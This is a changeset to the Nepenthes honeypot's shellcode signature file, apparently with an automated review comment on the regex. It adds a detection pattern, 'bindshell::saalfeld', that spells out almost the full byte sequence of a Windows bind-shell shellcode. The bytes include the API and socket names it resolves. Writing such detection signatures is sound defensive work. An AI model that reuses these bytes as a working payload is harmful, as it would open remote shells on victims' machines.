Changeset 456

Timestamp:
03/30/06 15:24:04 (3 years ago)
Author:
common
Message:

shellcode-signatures
- bindshell::saalfeld added

Files:

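--- a/nepenthes/trunk/modules/shellcode-signatures/shellcode-signatures.sc
+++ b/nepenthes/trunk/modules/shellcode-signatures/shellcode-signatures.sc
@@ -503,4 +503,59 @@
 };
 
+
+bindshell::saalfeld
+{
+        pattern
+        "\\xE9\\x19\\x02\\x00\\x00\\x5A\\x8B\\xDA\\x83\\xEB\\x07\\x6A\\xFF\\x53\\x64\\xA1"
+        "\\x00\\x00\\x00\\x00\\x50\\x64\\x89\\x25\\x00\\x00\\x00\\x00\\x33\\xDB\\xBB\\x00"
+        "\\x00\\xE0\\x77\\xE8\\xDC\\x01\\x00\\x00\\x81\\xFB\\x00\\x00\\xFF\\xBF\\x0F\\x83"
+        "\\xCE\\x01\\x00\\x00\\x81\\xC3\\x00\\x00\\x01\\x00\\x66\\x81\\x3B\\x4D\\x5A\\x75"
+        "\\xE7\\x33\\xC0\\x8B\\x43\\x3C\\x03\\xC3\\x66\\x81\\x38\\x50\\x45\\x75\\xD9\\x83"
+        "\\xC0\\x78\\x8B\\x30\\x03\\xF3\\x8B\\x4E\\x0C\\x03\\xCB\\x81\\x39\\x4B\\x45\\x52"
+        "\\x4E\\x75\\xC5\\x81\\x79\\x04\\x45\\x4C\\x33\\x32\\x75\\xBC\\x33\\xFF\\x8B\\x46"
+        "\\x20\\x03\\xC3\\x8B\\xCB\\x03\\x08\\x81\\x39\\x47\\x65\\x74\\x50\\x75\\x09\\x81"
+        "\\x79\\x04\\x72\\x6F\\x63\\x41\\x74\\x06\\x47\\x83\\xC0\\x04\\xEB\\xE5\\x03\\xFF"
+        "\\x03\\xFB\\x8B\\x56\\x24\\x03\\xFA\\x33\\xD2\\x66\\x8B\\x17\\x8B\\xFA\\x8B\\x46"
+        "\\x10\\x48\\x03\\xF8\\x33\\xC9\\x8B\\xCF\\x03\\xC9\\x03\\xC9\\x03\\x4E\\x1C\\x03"
+        "\\xCB\\x8B\\x39\\x03\\xFB\\xE9\\x69\\x01\\x00\\x00\\x5E\\x87\\xF7\\x8B\\xD7\\x33"
+        "\\xC0\\xF7\\xD0\\x8B\\xC8\\xF2\\xAF\\x89\\x32\\x8D\\x42\\x08\\x52\\x50\\x53\\xFF"
+        "\\x12\\x5A\\x89\\x42\\x04\\x8D\\x72\\x15\\x52\\x56\\xFF\\x52\\x04\\x5A\\x33\\xC0"
+        "\\xAC\\x84\\xC0\\x75\\xF9\\x33\\xC9\\x8A\\x0E\\x84\\xC9\\x74\\x09\\x52\\x56\\x53"
+        "\\xFF\\x12\\x5A\\xAB\\xE2\\xE8\\x46\\x52\\x56\\xFF\\x52\\x04\\x5A\\x8B\\xD8\\x33"
+        "\\xC0\\xAC\\x84\\xC0\\x75\\xF9\\x33\\xC9\\x8A\\x0E\\x80\\xF9\\x02\\x74\\x09\\x52"
+        "\\x56\\x53\\xFF\\x12\\x5A\\xAB\\xE2\\xE7\\x33\\xC0\\x50\\x40\\x50\\x40\\x50\\xFF"
+        "\\x57\\xE8\\x93\\x6A\\x10\\x56\\x53\\xFF\\x57\\xEC\\x6A\\x02\\x53\\xFF\\x57\\xF0"
+        "\\x33\\xC0\\x57\\x50\\xB0\\x0C\\xAB\\x58\\xAB\\x40\\xAB\\x5F\\x48\\x50\\x57\\x56"
+        "\\xAD\\x56\\xFF\\x57\\xC0\\x48\\x50\\x57\\xAD\\x56\\xAD\\x56\\xFF\\x57\\xC0\\x48"
+        "\\xB0\\x44\\x89\\x07\\x57\\xFF\\x57\\xC4\\x33\\xC0\\x8B\\x46\\xF4\\x89\\x47\\x3C"
+        "\\x89\\x47\\x40\\x8B\\x06\\x89\\x47\\x38\\x33\\xC0\\x66\\xB8\\x01\\x01\\x89\\x47"
+        "\\x2C\\x57\\x57\\x33\\xC0\\x50\\x50\\x50\\x40\\x50\\x48\\x50\\x50\\xAD\\x56\\x33"
+        "\\xC0\\x50\\xFF\\x57\\xC8\\xFF\\x76\\xF0\\xFF\\x57\\xCC\\xFF\\x76\\xFC\\xFF\\x57"
+        "\\xCC\\x48\\x50\\x50\\x53\\xFF\\x57\\xF4\\x8B\\xD8\\x33\\xC0\\xB4\\x04\\x50\\xC1"
+        "\\xE8\\x04\\x50\\xFF\\x57\\xD4\\x8B\\xF0\\x33\\xC0\\x8B\\xC8\\xB5\\x04\\x50\\x50"
+        "\\x57\\x51\\x56\\xFF\\x77\\xA8\\xFF\\x57\\xD0\\x83\\x3F\\x01\\x7C\\x22\\x33\\xC0"
+        "\\x50\\x57\\xFF\\x37\\x56\\xFF\\x77\\xA8\\xFF\\x57\\xDC\\x0B\\xC0\\x74\\x2F\\x33"
+        "\\xC0\\x50\\xFF\\x37\\x56\\x53\\xFF\\x57\\xF8\\x6A\\x50\\xFF\\x57\\xE0\\xEB\\xC8"
+        "\\x33\\xC0\\x50\\xB4\\x04\\x50\\x56\\x53\\xFF\\x57\\xFC\\x57\\x33\\xC9\\x51\\x50"
+        "\\x56\\xFF\\x77\\xAC\\xFF\\x57\\xD8\\x6A\\x50\\xFF\\x57\\xE0\\xEB\\xAA\\x50\\xFF"
+        "\\x57\\xE4\\xEB\\xFE\\x58\\x50\\x89\\x42\\xF2\\xC3\\x8B\\x44\\x24\\x0C\\x05\\xB8"
+        "\\x00\\x00\\x00\\xC7\\x00\\x78\\x56\\x34\\x12\\x33\\xC0\\xC3\\xEB\\xEC\\xE8\\xE2"
+        "\\xFD\\xFF\\xFF\\xE8\\x92\\xFE\\xFF\\xFF\\x4B\\x56\\xE7\\x77\\x23\\x80\\xE7\\x77"
+        "\\x4C\\x6F\\x61\\x64\\x4C\\x69\\x62\\x72\\x61\\x72\\x79\\x41\\x00\\x4B\\x45\\x52"
+        "\\x4E\\x45\\x4C\\x33\\x32\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x69\\x70\\x65"
+        "\\x00\\x47\\x65\\x74\\x53\\x74\\x61\\x72\\x74\\x75\\x70\\x49\\x6E\\x66\\x6F\\x41"
+        "\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x41\\x00"
+        "\\x43\\x6C\\x6F\\x73\\x65\\x48\\x61\\x6E\\x64\\x6C\\x65\\x00\\x50\\x65\\x65\\x6B"
+        "\\x4E\\x61\\x6D\\x65\\x64\\x50\\x69\\x70\\x65\\x00\\x47\\x6C\\x6F\\x62\\x61\\x6C"
+        "\\x41\\x6C\\x6C\\x6F\\x63\\x00\\x57\\x72\\x69\\x74\\x65\\x46\\x69\\x6C\\x65\\x00"
+        "\\x52\\x65\\x61\\x64\\x46\\x69\\x6C\\x65\\x00\\x53\\x6C\\x65\\x65\\x70\\x00\\x45"
+        "\\x78\\x69\\x74\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x00\\x00\\x57\\x53\\x4F\\x43"
+        "\\x4B\\x33\\x32\\x00\\x73\\x6F\\x63\\x6B\\x65\\x74\\x00\\x62\\x69\\x6E\\x64\\x00"
+        "\\x6C\\x69\\x73\\x74\\x65\\x6E\\x00\\x61\\x63\\x63\\x65\\x70\\x74\\x00\\x73\\x65"
+        "\\x6E\\x64\\x00\\x72\\x65\\x63\\x76\\x00\\x02\\x00(..)";
+        mapping (none,port);
+        
+//      reference "http://nepenthes.mwcollect.org/csni:shellcodes:saalfeld";
+};
 
 connectbackshell::mandragore
@@ -956,2 +1011,3 @@
 
 
+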
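Review bot: The port capture `(..)` that closes the pattern on new line 555 depends on `.` matching any byte, and if the signature compiler builds the PCRE without the DOTALL option then `.` will not match 0x0A, so a bind port with a 0x0A byte in either position (for example 10 or 2560) fails the whole match and the sample is not classified at all. Unless DOTALL is confirmed to be set for these patterns, an explicit byte class is the safer spelling: `"\\x6E\\x64\\x00\\x72\\x65\\x63\\x76\\x00\\x02\\x00([\\x00-\\xff]{2})";`. The `reference` line on new line 558 is commented out, which ships the signature without provenance; either restore it or add a comment beside it stating why it is disabled. The whole `bindshell::saalfeld` definition lies inside this hunk, so nothing about it is hidden from review.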